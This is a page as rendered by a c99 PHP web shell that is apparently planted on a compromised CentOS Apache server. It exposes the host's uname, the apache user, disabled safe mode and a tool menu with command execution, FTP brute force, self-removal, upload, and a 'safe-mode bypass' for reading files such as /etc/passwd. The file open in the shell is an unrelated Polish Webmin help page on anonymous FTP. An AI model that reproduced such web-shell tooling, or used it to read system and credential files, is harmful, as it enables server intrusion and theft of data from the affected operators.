!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/wuftpd/help/   drwxr-xr-x
Free 50.87 GB of 127.8 GB (39.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     anon.pl.html (1.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Anonimowe FTP
Pierwsza tabela umożliwia zdefiniowanie kartoteki, do której przełączy się serwer za pomocą chroot gdy loguje się anonimowy użytkownik. Dla różnych klas mogą być użyte inne kartoteki. Jeżeli nie zdefiniowano żadnej kartoteki, serwer FTP przełączy się do katroteki home użytkownika ftp.

Ponieważ serwer używa zewnętrznych programów, takich jak lstar, anonimowa kartoteka "root" musi zawierać kartotekę bin z tymi programami, kartotekę lib zawierającą wszystkie niezbędne biblioteki dzielone, oraz kartotekę etc zawierająca zbiory passwdgroup. Kiedy serwer wykonuje chroot, by ograniczyć dostęp jedynie do anonimowej kartoteki "root", to nie ma możliwości dostępu do żadnych programów poza tą kartoteką.

Druga tabela umożliwa zdefiniowanie kartotek, do których serwer wykona chroot dla gości. Dla każdej kartoteki można określić, których użytkowników ona dotyczy poprzez wprowadzenie nazwy, UID (jak %3000) lub zakresu UID (jak %3000-3006). Jeżeli nie wprowadzono użytkowników, to kartoteka będzie użyta dla wszystkich gości.

Trzecia tabela umożliwia zdefiniowanie grupy Unixa, do której będą przełączeni użytkownicy anonimowi (zamiast pierwotnej grupy użytkownika ftp. Dla każdej takie grupy można wybrać jedną lub więcej klas użytkowników, na przykład po to, by umożliwić dostęp do niektórych plików tylko spod określonych adresów IP.

U dołu strony definiujemy jakie hasła będą wymagane od anonimowych użytkowników FTP. Tradycyjnie powinien to być prawidłowy adres email.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0112 ]--